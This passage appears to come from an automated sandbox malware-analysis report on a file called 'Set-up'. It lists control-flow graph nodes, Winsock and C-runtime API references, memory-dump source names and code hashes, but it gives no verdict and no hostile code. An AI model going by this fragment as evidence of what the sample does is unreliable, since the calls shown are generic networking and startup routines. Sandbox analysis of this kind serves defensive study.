                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _close_exit_open_write
                          • String ID: terminated$,&o$@$CONOUT$
                          • API String ID: 28676597-1958761126
                          • Opcode ID: d2faedd5493422dc68bf380048360d7ef7a9e61ec2c2c0a8156f2a423b265011
                          • Instruction ID: 8877d0c4b8c60bde9deb8631aabd5f50b598f7cea5429a93c2ac04a87832d86a
                          • Opcode Fuzzy Hash: d2faedd5493422dc68bf380048360d7ef7a9e61ec2c2c0a8156f2a423b265011
                          • Instruction Fuzzy Hash: 674137B09043058FCB01EF79D844A6EBBE5EB49354F018A2EE8A5D7390EB78D845CF56

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 972 eaa30-eaa64 974 eaa6a-eaaa7 call de730 972->974 975 eab04-eab09 972->975 979 eab0e-eab13 974->979 980 eaaa9-eaabd 974->980 976 eae80-eae89 975->976 981 eae2e 979->981 982 eaabf-eaac7 980->982 983 eab18-eab50 htons 980->983 986 eae30-eae4a call dea60 call debf0 981->986 982->981 984 eaacd-eab02 htons 982->984 985 eab58-eab6d 983->985 984->985 987 eab6f-eab73 985->987 988 eab96-eabab socket 985->988 1004 eae4c-eae57 986->1004 1005 eae75-eae7d 986->1005 987->988 990 eab75-eab8f 987->990 988->981 992 eabb1-eabc5 988->992 990->992 1003 eab91 990->1003 994 eabc7-eabca 992->994 995 eabd0-eabed ioctlsocket 992->995 994->995 998 ead2e-ead39 994->998 999 eabef-eac0a setsockopt 995->999 1000 eac10-eac14 995->1000 1006 ead3b-ead4c 998->1006 1007 ead52-ead56 998->1007 999->1000 1008 eae29 999->1008 1001 eac16-eac31 setsockopt 1000->1001 1002 eac37-eac41 1000->1002 1001->1002 1001->1008 1009 eac7a-eac7e 1002->1009 1010 eac43-eac46 1002->1010 1003->981 1012 eae6e-eae6f closesocket 1004->1012 1013 eae59-eae5e 1004->1013 1005->976 1006->1007 1006->1008 1007->1008 1011 ead5c-ead6b 1007->1011 1008->981 1019 eace7-eacfe setsockopt 1009->1019 1020 eac80-eac9b 1009->1020 1015 eac4c-eac51 1010->1015 1016 ead04-ead08 1010->1016 1017 ead70-ead78 1011->1017 1012->1005 1013->1012 1021 eae60-eae6c 1013->1021 1015->1016 1022 eac57-eac78 htonl 1015->1022 1016->998 1026 ead0a-ead28 setsockopt 1016->1026 1023 ead7a-ead7f 1017->1023 1024 eada0-eadad connect 1017->1024 1019->1016 1020->1019 1025 eac9d-eacc1 1020->1025 1021->1005 1028 eacc6-eacd7 bind 1022->1028 1023->1024 1029 ead81-ead99 1023->1029 1030 eadb3-eadcf WSAGetLastError 1024->1030 1025->1028 1026->998 1026->1008 1028->1008 1031 eacdd-eace5 1028->1031 1029->1030 1032 eae8a-eae91 1030->1032 1033 eadd5-eadd8 1030->1033 1031->1016 1031->1019 1032->986 1035 eadda-eaddf 1033->1035 1036 eade1-eadf1 1033->1036 1035->1017 1035->1036 1037 eae0d-eae12 1036->1037 1038 eadf3-eae07 1036->1038 1039 eae1a-eae1c call eaf70 1037->1039 1040 eae14-eae17 1037->1040 1038->1037 1043 eaea8-eaead 1038->1043 1044 eae21-eae23 1039->1044 1040->1039 1043->986 1045 eae25-eae27 1044->1045 1046 eae93-eae9d 1044->1046 1045->986 1047 eaeaf-eaeb1 call de760 1046->1047 1048 eae9f-eaea6 call de7c0 1046->1048 1052 eaeb6-eaebe 1047->1052 1048->1052 1053 eaf1a-eaf1f 1052->1053 1054 eaec0-eaedb call de180 1052->1054 1053->986 1054->986 1057 eaee1-eaeec 1054->1057 1058 eaeee-eaeff 1057->1058 1059 eaf02-eaf06 1057->1059 1058->1059 1060 eaf0e-eaf15 1059->1060 1061 eaf08-eaf0b 1059->1061 1060->976 1061->1060
                          APIs
                          • htons.WS2_32(?), ref: 000EAAE8
                          • htons.WS2_32(?), ref: 000EAB33
                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 000EAB9A
                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 000EABE3
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 000EAC02
                          • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 000EAC29
                          • htonl.WS2_32(00000000), ref: 000EAC69
                          • bind.WS2_32(?,00000017,0000001C), ref: 000EACCF
                          • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 000EACFE
                          • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 000EAD20
                          • WSAGetLastError.WS2_32 ref: 000EADB5
                          • closesocket.WS2_32(?), ref: 000EAE6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                          • String ID:
                          • API String ID: 4039825230-0
                          • Opcode ID: ca5678fad836d728aa44afccdcac2022ebf7214ba5b9ece4f290fef8bd53275b
                          • Instruction ID: 5fe1ad64baec7d1d9089b04358ec1ddfce55defd5380ab882700cdad28dde6d3
                          • Opcode Fuzzy Hash: ca5678fad836d728aa44afccdcac2022ebf7214ba5b9ece4f290fef8bd53275b
                          • Instruction Fuzzy Hash: D1E19E707043819FEB208F25C884B6A77E5BF8A310F144A29F999AB2A1D775E944CB52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1063 2116c-2118a 1064 21430-21439 GetStartupInfoA 1063->1064 1065 21190-211a1 1063->1065 1067 21448-2145d _cexit 1064->1067 1066 211bc-211c8 1065->1066 1068 211ca-211d4 1066->1068 1069 211a8-211aa 1066->1069 1070 213e3-213f7 call 3a8a20 1068->1070 1071 211da-211e1 1068->1071 1072 213d0-213dd 1069->1072 1073 211b0-211b9 Sleep 1069->1073 1078 211ff-21201 1070->1078 1079 213fd-2141d _initterm 1070->1079 1075 21460-21479 _initterm 1071->1075 1076 211e7-211f9 1071->1076 1072->1070 1072->1071 1073->1066 1082 21483 1075->1082 1076->1078 1076->1079 1080 21423-21429 1078->1080 1081 21207-2120e 1078->1081 1079->1080 1079->1081 1080->1081 1083 21210-21229 1081->1083 1084 2122c-2126c call 3a93e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call 3a9210 __p__acmdln 1081->1084 1086 2148a-21499 exit 1082->1086 1083->1084 1091 21281-21287 1084->1091 1092 2126e 1084->1092 1094 21270-21272 1091->1094 1095 21289-21294 1091->1095 1093 212bd-212c5 1092->1093 1096 212c7-212d0 1093->1096 1097 212db-212fa malloc 1093->1097 1098 21274-21277 1094->1098 1099 212b8 1094->1099 1100 2127e 1095->1100 1101 213c0-213c4 1096->1101 1102 212d6 1096->1102 1097->1082 1105 21300-21311 1097->1105 1103 212a0-212a2 1098->1103 1104 21279 1098->1104 1099->1093 1100->1091 1101->1102 1102->1097 1103->1099 1107 212a4 1103->1107 1104->1100 1106 21318-2134c strlen malloc memcpy 1105->1106 1106->1106 1108 2134e-2139b call 3a9060 call 4fb4f0 1106->1108 1109 212a8-212b1 1107->1109 1108->1086 1115 213a1-213a9 1108->1115 1109->1099 1111 212b3-212b6 1109->1111 1111->1099 1111->1109 1115->1067 1116 213af-213ba 1115->1116
                          APIs
                          • Sleep.KERNEL32 ref: 000211B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                          • GetStartupInfoA.KERNEL32 ref: 00021433
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 3873122205-0
                          • Opcode ID: 6992b57e130327b204df4790f85b3d58441a7e4f09516c4f021a6f9af006eaec
                          • Instruction ID: af18b6c44a6248fba4f8547ee20990ff10162b54ad8be9a019eaa7f8d3b97d46
                          • Opcode Fuzzy Hash: 6992b57e130327b204df4790f85b3d58441a7e4f09516c4f021a6f9af006eaec
                          • Instruction Fuzzy Hash: 29819CB1908325CFDB50EF64E8817AEBBE2FF55304F00442DE9859B352DB75A858CB91

                          Control-flow Graph

                          Strings
                          • error CryptGenRandom 0x%08lx, xrefs: 004F3A69
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: error CryptGenRandom 0x%08lx
                          • API String ID: 0-1222942552
                          • Opcode ID: 56512d8b00437d8a7f9a3cead9cc1108d4ea42d018cffed5e5527290117ad894
                          • Instruction ID: 11810400d755a14d619ce0133b81507406f735662ea5b6bf0fe2dc804f681fa6
                          • Opcode Fuzzy Hash: 56512d8b00437d8a7f9a3cead9cc1108d4ea42d018cffed5e5527290117ad894
                          • Instruction Fuzzy Hash: 7C41E4B59093019FC700EF78D58962ABBE1AB88345F419E2EF899C7350EB78C544CF42

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1245 305b0-305b7 1246 307ee 1245->1246 1247 305bd-305d4 1245->1247 1248 307e7-307ed 1247->1248 1249 305da-305e6 1247->1249 1248->1246 1249->1248 1250 305ec-305f0 1249->1250 1251 307c7-307cc 1250->1251 1252 305f6-30620 call 37350 call 270b0 1250->1252 1251->1248 1257 30622-30624 1252->1257 1258 3066a-3068c call 5dec0 1252->1258 1260 30630-30655 call 270d0 call 303c0 call 37450 1257->1260 1263 30692-306a0 1258->1263 1264 307d6-307e3 call 37380 1258->1264 1291 3065b-30668 call 270e0 1260->1291 1292 307ce 1260->1292 1266 306a2-306a4 1263->1266 1267 306f4-306f6 1263->1267 1264->1248 1270 306b0-306e4 call 373b0 1266->1270 1272 307ef-3082b call 33000 1267->1272 1273 306fc-306fe 1267->1273 1270->1264 1290 306ea-306ee 1270->1290 1286 30831-30837 1272->1286 1287 30a2f-30a35 1272->1287 1277 3072c-30754 1273->1277 1279 30756-3075b 1277->1279 1280 3075f-3078b getsockopt 1277->1280 1284 30707-30719 WSAEventSelect 1279->1284 1285 3075d 1279->1285 1288 30791-30796 1280->1288 1289 30700-30703 1280->1289 1284->1264 1300 3071f 1284->1300 1295 30723-30726 1285->1295 1296 30861-3087e WSAWaitForMultipleEvents 1286->1296 1297 30839-30842 call 36fa0 1286->1297 1293 30a37-30a3a 1287->1293 1294 30a3c-30a52 1287->1294 1288->1289 1298 3079c-307c2 call 276a0 1288->1298 1289->1284 1290->1270 1299 306f0 1290->1299 1291->1258 1291->1260 1292->1264 1293->1294 1294->1264 1302 30a58-30a81 call 32f10 1294->1302 1295->1272 1295->1277 1305 30882-3088d 1296->1305 1308 30847-3084c 1297->1308 1298->1289 1299->1267 1300->1295 1302->1264 1319 30a87-30a97 call 36df0 1302->1319 1310 30893-308b1 1305->1310 1311 30970-30975 1305->1311 1315 30852 1308->1315 1316 30a9c-30aa4 1308->1316 1317 308c8-308f7 WSAEnumNetworkEvents 1310->1317 1312 3097b-30989 call 270b0 1311->1312 1313 30a19-30a2c WSAResetEvent 1311->1313 1312->1313 1326 3098f-3099e 1312->1326 1313->1287 1315->1296 1320 30854-3085f 1315->1320 1316->1264 1321 308f9-308fb 1317->1321 1322 308fd-30925 1317->1322 1319->1264 1320->1305 1325 30928-3093f WSAEventSelect 1321->1325 1322->1325 1328 308b3-308c2 1325->1328 1329 30945-3096b 1325->1329 1330 309b0-309c1 call 270d0 1326->1330 1328->1311 1328->1317 1329->1328 1333 309c3-309c7 1330->1333 1334 309a0-309ae call 270e0 1330->1334 1336 309e8-30a03 WSAEnumNetworkEvents 1333->1336 1334->1313 1334->1330 1338 309d0-309e6 WSAEventSelect 1336->1338 1339 30a05-30a17 1336->1339 1338->1334 1338->1336 1339->1338
                          APIs
                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00030711
                          • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00030783
                          • WSAWaitForMultipleEvents.WS2_32(00000001,00023EBE,00000000,00000000,00000000), ref: 0003086F
                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000308EF
                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00030934
                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 000309DC
                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000309FB
                          • WSAResetEvent.WS2_32(8508C483), ref: 00030A1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                          • String ID: multi.c
                          • API String ID: 3264668090-214371023
                          • Opcode ID: e7981b50ab3304e6d503ba5cc1fc3820a843d08796a282f0a4faec68d8e76e88
                          • Instruction ID: d9b37dac28c1d39fafd4016d2532f0c8452358c0b409f160ab470fdbb19e2e8f
                          • Opcode Fuzzy Hash: e7981b50ab3304e6d503ba5cc1fc3820a843d08796a282f0a4faec68d8e76e88
                          • Instruction Fuzzy Hash: 8BD1C071A093019FE722DF64D891BAB77E9FF84308F04482DF889C6252E775E958CB52
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: b4823cce7c4ed899a359298ca37ba1cef56b21666dfaf4e771734a58ce94c0f6
                          • Instruction ID: 354b9aac3ce7ee42f0eea10f1b0aec1328f011362059dee8fe6d39204d88e30b
                          • Opcode Fuzzy Hash: b4823cce7c4ed899a359298ca37ba1cef56b21666dfaf4e771734a58ce94c0f6
                          • Instruction Fuzzy Hash: 0F91FFB160C3498BD7768B69C8847BBB2EDEFC4360F148B2CE89D861D5EB719D40D681
                          APIs
                          • Sleep.KERNEL32 ref: 000211B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                          • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002140C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 1209083157-0
                          • Opcode ID: f7a33ff89da467e18089bb3b4d6ad08cb53f7e886aede8d824bdd30b8f3122ce
                          • Instruction ID: 54981c0a3d3355dd35d162b770a4e2027db375a96b372b153a5303826e9b6d24
                          • Opcode Fuzzy Hash: f7a33ff89da467e18089bb3b4d6ad08cb53f7e886aede8d824bdd30b8f3122ce
                          • Instruction Fuzzy Hash: 274137B0A043158FEB51EF68E9807AEBBE2FF55304F00592DD8889B352DB74A945CF91
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                            • Part of subcall function 003A8A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,000213EF), ref: 003A8A2A
                          • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002140C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 2715571461-0
                          • Opcode ID: 5473786f66ef193d2cc2137cf999330896b3d00ae423b0f64c6db487adb00976
                          • Instruction ID: a331a794726f366f41c2845bbc534a0a0a1e0689d3158f4eee456020ee2bb1ae
                          • Opcode Fuzzy Hash: 5473786f66ef193d2cc2137cf999330896b3d00ae423b0f64c6db487adb00976
                          • Instruction Fuzzy Hash: B84144B0A083158FDB51EF64E8807ADBBE2FF55304F10582DE9889B352DB74A844CF52
                          APIs
                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 000EB2B6
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,000D3C41,00000000), ref: 000EB3F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
